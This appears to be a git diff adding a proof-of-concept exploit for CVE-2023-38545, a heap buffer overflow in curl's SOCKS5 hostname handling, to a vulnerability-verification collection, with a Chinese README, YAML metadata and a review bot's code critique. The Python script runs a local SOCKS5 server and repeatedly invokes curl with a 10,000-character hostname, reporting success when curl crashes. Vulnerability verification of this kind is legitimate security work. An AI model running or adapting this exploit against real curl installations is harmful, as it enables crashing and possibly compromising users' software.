diff --git a/cve/curl/2023/CVE-2023-38545/CVE-2023-38545.py b/cve/curl/2023/CVE-2023-38545/CVE-2023-38545.py
new file mode 100644
index 0000000000000000000000000000000000000000..bf5151e498d2788e5c86fdea2d93cc258a9115b4
--- /dev/null
+++ b/cve/curl/2023/CVE-2023-38545/CVE-2023-38545.py
@@ -0,0 +1,89 @@
+import socket
+import os
+import threading
+import sys
+# chatgpt生成简易的socks服务
+def start_server(host, port):
+ # 创建监听socket
+ server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ server_socket.bind((host, port))
+ server_socket.listen(1)
+ #print(f'Socks5 proxy server started on {host}:{port}')
+
+ while True:
+ # 接受客户端连接
+ client_socket, client_address = server_socket.accept()
+ #print(f'Accepted connection from {client_address[0]}:{client_address[1]}')
+
+ # 处理客户端请求
+ data = client_socket.recv(4096)
+ # 实现Socks5协议的握手过程
+ client_socket.send(b'\x05\x00')
+ data = client_socket.recv(4096)
+ # 解析客户端请求
+ version = data[0]
+ cmd = data[1]
+ addrtype = data[3]
+ if addrtype == 1:
+ # IPv4地址类型
+ dest_addr = socket.inet_ntoa(data[4:8])
+ dest_port = int.from_bytes(data[8:10], byteorder='big')
+ elif addrtype == 3:
+ # 域名地址类型
+ dest_addr_len = data[4]
+ dest_addr = data[5:5+dest_addr_len]
+ dest_port = int.from_bytes(data[5+dest_addr_len:7+dest_addr_len], byteorder='big')
+ else:
+ # 不支持的地址类型
+ client_socket.close()
+ continue
+
+ # 连接目标服务器
+ server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ server_socket.connect((dest_addr, dest_port))
+
+ # 响应客户端连接成功
+ reply = b'\x05\x00\x00\x01'
+ reply += socket.inet_aton('0.0.0.0') + (port).to_bytes(2, byteorder='big')
+ client_socket.send(reply)
+
+ # 进行数据转发
+ while True:
+ data = client_socket.recv(4096)
+ if len(data) == 0:
+ break
+ server_socket.sendall(data)
+
+ # 关闭连接
+ client_socket.close()
+ server_socket.close()
+
+def poc():
+ command_parts = [
+ "curl",
+ "--limit-rate", "1025",
+ "-vvv",
+ "-x", "socks5h://127.0.0.1:10801",
+ "$(python3 -c \"print(('A'*10000), end='')\")"
+ ]
+ command = " ".join(command_parts)
+
+ # 执行命令
+ exit_code = os.system(command) >> 8
+ #print(f"命令的退出状态码:{exit_code}")
+ return exit_code
+
+
+
+if __name__ == '__main__':
+ for _ in range(50):
+ # 启动服务器的线程
+ server_thread = threading.Thread(target=start_server, args=('127.0.0.1', 10801))
+ server_thread.start()
+ sys.stderr = open(os.devnull, 'w')
+ # 执行 poc
+ exit_code=poc()
+ if exit_code==134 or exit_code==139:
+ print('status:successfully')
+ sys.exit()
+ print('status:failed')
diff --git a/cve/curl/2023/CVE-2023-38545/README.md b/cve/curl/2023/CVE-2023-38545/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..fa461a2488c03c364ff311f6db144f0a28112495
--- /dev/null
+++ b/cve/curl/2023/CVE-2023-38545/README.md
@@ -0,0 +1,4 @@
+## 漏洞验证
+'''
+python3 CVE-2023-38545.py
+'''
diff --git a/cve/curl/2023/yaml/CVE-2023-38545.yaml b/cve/curl/2023/yaml/CVE-2023-38545.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..ff98ff8465b8bae999364693cb7beb31d4c34200
--- /dev/null
+++ b/cve/curl/2023/yaml/CVE-2023-38545.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-38545
+source:
+info:
+ name: curl是一款用于从服务器传输数据或向服务器传输数据的工具。
+ severity: High
+ description: |
+ 当要求curl将主机名传给SOCKS5代理进行地址解析时,若主机名超过255字节,curl将会发生基于堆的缓冲区溢出。由于在缓慢的SOCKS5握手中,一个本地变量可能会产生错误值,导致curl不是复制已解析的地址,而是复制过长的主机名至目标缓冲区。此漏洞同时影响命令行工具curl和依赖库libcurl。
+ scope-of-influence:
+ 7.69.0<=curl<=8.3.0
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-38545
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2023-38545
+ cwe-id: CWE-787
+ cnvd-id: None
+ kve-id: None
+ tags: cve2023, 缓冲区溢出
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 5325a720830bc7d9e96e508120a0ebdf60e51e86..4a67c9713282abc1d78813add131538f08c88494 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -73,4 +73,6 @@ cve:
 - CVE-2023-21752
 glibc:
 - CVE-2023-4911
+ curl:
+ - CVE-2023-38545
 cnvd:
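Review bot: `sys.stderr = open(os.devnull, 'w')` sits inside the `for _ in range(50)` loop in the `__main__` block, so every iteration opens a fresh devnull handle that is never closed, and because stderr is where `threading` reports an uncaught exception, any `OSError` raised in a server thread (a failed `bind()` on a port still in use, for example) is silently dropped instead of surfaced as a failed run. Open the redirect once before the loop and scope it, e.g. `with open(os.devnull, 'w') as devnull, contextlib.redirect_stderr(devnull):` wrapping the loop (needs `import contextlib`), so the handle is released and the suppression is explicit. In `start_server` the name `server_socket` is rebound to the outbound connection on the second `socket.socket(socket.AF_INET, socket.SOCK_STREAM)` line, so the listening socket is dropped after the first client and the next `accept()` is attempted on that connection, which the handler has already closed; give the outbound socket its own name such as `remote_socket` and close the listener in a `finally`. `version` and `cmd` are assigned but never read, and `data[0]` raises `IndexError` when `recv()` returns empty bytes, so a guard like `if len(data) < 4: client_socket.close(); continue` before the parsing would make the handler's failure modes explicit rather than a traceback.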